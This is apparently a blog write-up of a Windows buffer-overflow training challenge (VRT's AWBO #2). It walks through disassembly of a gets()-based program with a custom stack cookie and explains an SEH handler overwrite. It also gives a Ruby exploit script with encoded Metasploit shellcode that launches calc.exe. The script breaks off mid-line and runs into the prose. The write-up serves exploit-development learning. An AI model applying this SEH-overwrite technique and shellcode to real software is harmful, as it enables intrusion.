Advanced Windows Buffer Overflows: Take #2
This time around we will take a look at the second challenge taken from
VRT's AWBO
challenges. Let's go straight for it by looking at the disassembly dump:
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 1036
.text:00401009 push ebx
.text:0040100A push esi
.text:0040100B push edi
.text:0040100C mov eax, endSequence
.text:00401011 mov [ebp+Buf1], eax ; Buf1 = "\x00\x0a\x0d\x20"
.text:00401014 mov cl, byte_406034
.text:0040101A mov [ebp+var_4], cl
.text:0040101D int 3 ; Trap to Debugger
.text:0040101E lea edx, [ebp+Buffer]
.text:00401024 mov [ebp+var_C], edx
.text:00401027 lea eax, [ebp+Buffer]
.text:0040102D push eax ; Buffer
.text:0040102E call _gets
.text:00401033 add esp, 4
.text:00401036 mov ecx, [ebp+var_C]
.text:00401039 push ecx
.text:0040103A push offset Format ; "You sent me: %s"
.text:0040103F call _printf
.text:00401044 add esp, 8
.text:00401047 push 4 ; Size
.text:00401049 push offset nil_r_n_space ; Buf2
.text:0040104E lea edx, [ebp+Buf1]
.text:00401051 push edx ; Buf1
.text:00401052 call _memcmp
.text:00401057 add esp, 0Ch
.text:0040105A test eax, eax
.text:0040105C jz short loc_40107C
.text:0040105E push offset aFail_ ; "Fail.\n"
.text:00401063 call _printf
.text:00401068 add esp, 4
.text:0040106B push 4 ; Size
.text:0040106D push offset aAaaa ; "AAAA"
.text:00401072 push 0 ; Dst
.text:00401074 call _memcpy
.text:00401079 add esp, 0Ch
.text:0040107C
.text:0040107C loc_40107C: ; CODE XREF: _main+5Cj
.text:0040107C xor eax, eax
.text:0040107E pop edi
.text:0040107F pop esi
.text:00401080 pop ebx
.text:00401081 mov esp, ebp
.text:00401083 pop ebp
.text:00401084 retn
.text:00401084 _main endpIn essence what we have here is a simple program thats uses C's
gets()
function to receive input from the user. The obviosu attack vector is to overwrite some information on the stack. Unfortunately, this function places a custom cookie consisting on the 4 byte sequence
0x00 0x20 0x0a 0x0d
.
Then it's clear that we can't overflow the return address in the traditional sense because a check is made right before returning the function to check that the cookie contains this very value and if the check fails, we try to make a impossible memcpy into address
0x00000000
which causes and exception.
Talking about impossible paths and exception, the only choice we have is to go after the exception handler. Since the system we're playing with is Windows 2000, we have a very easy platform where we can abuse the Structured Exception Handler (SEH from now on). Like we did last time, using metasploit's pattern generating tools we will analyze the stack situation and see where this SEH structure is located. Research will show that the EXCEPTION_REGISTRATION structure is located 1084 bytes after the beginning of our input. Let's remind ourselves how this stack structure looks like:
The structure contains two members, first of which is a pointer to the next EXCEPTION_REGISTRATION structure (remember that exceptions are chained across stack frames) and the second being the
Exception Handler
itself. As we're using Windows 2000, the
ebx
register always points into to the current frame's EXCEPTION_REGISTRATION structure. We will use to our advantage to overwrite the handler with the address of a 'jmp ebx' instruction, redirecting execution to the beginning of the EXCEPTION_REGISTRATION structure.
Since we're going to abuse the exception handling right away in our stack frame, we don't need to care about the pointer to the next EXCEPTION_REGISTRATION structure. Therefore, we will place a small piece of code in the beginning of the structure in such a way that once execution comes back after the 'jmp ebx' instruction, we will jump over the bytes pointing to the 'jmp ebx' instruction, where our first stage shellcode will be awaiting. From now on, we have full control of the execution and we can place whatever code we want to run after our 'tweaked' EXCEPTION_REGISTRATION structure. Unfortunately there's very little stack space left because this is a one-stack-frame program. What we will do in this case, is place some special assembly that will send us back to the beginning of our user input where we have more than a thousand free bytes which should be enough for a PoC shellcode. All this considered, this is the layout of our exploit input:
| NOP sled | Shellcode | jump-over-struct | ret_addr | stage1
Since
ebx
points the EXCEPTION_REGISTRATION structure and our user input will be close before it, we will decrement ebx sequentially until we can make it have a value that points into our input. We need to make the arguments of this decrement opcodes smaller or equal to
0x7F
because otherwise we would be using a full 4 bytes operand and that would add null bytes to our shellcode, which we don't want. This is the exploit code in ruby format:
#!/usr/bin/env ruby
# windows/exec - 304 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=process, CMD=calc.exe
shellcode = "\x89\xe0\xdd\xc5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x50\x44\x45\x50\x43\x30" +
"\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" +
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b" +
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" +
"\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4d\x49\x4e\x4c" +
"\x4b\x34\x49\x50\x44\x34\x43\x37\x49\x51\x48\x4a\x44\x4d" +
"\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x46\x34\x51\x34" +
"\x43\x34\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x46\x44\x43\x31" +
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" +
"\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" +
"\x4a\x4b\x4d\x59\x51\x4c\x51\x34\x45\x54\x48\x43\x51\x4f" +
"\x46\x51\x4c\x36\x43\x50\x46\x36\x43\x54\x4c\x4b\x47\x36" +
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" +
"\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4b\x33" +
"\x49\x50\x42\x4a\x46\x30\x42\x48\x43\x4e\x49\x48\x4b\x52" +
"\x42\x53\x42\x48\x4c\x58\x4b\x4e\x4c\x4a\x44\x4e\x50\x57" +
"\x4b\x4f\x4b\x57\x43\x53\x43\x51\x42\x4c\x42\x43\x46\x4e" +
"\x42\x45\x42\x58\x45\x35\x43\x30\x41\x41"
# jump over Handler overwrite
jump = "\xCC\xEB\x10\xCC"
# decrement ebx to point to our shellcode and jump to it
stage1 = "\x83\xEB\x7F"*8+"\xFF\xE3"
# put it all together and print it
puts ("\x90"*(1084-shellcode.length))<
WinExec()
to execute calc.exe. Since this is quite small program and runs very fast and
WinExec()
is an asynchronous call, the API doesn't have enought time to actually finish executing the call and hence, only works in a debugger environment making it run step-by-step (to give enough time to the API call). The basic workaround for this is to include a call to
Sleep()
in the shellcode, but since these shellcodes are quite optimized it's quite a pain in the ass editing or tweaking them. My basic objective for this challenge was to make it run arbitrary code, and that's clearly done. Also I've recently got a copy of the flamboyant new edition of Windows Internals and I'm quite eager to dive in it.
Credits go to
Ruben Santamarta
for pointing out the WinExec issue. See you around!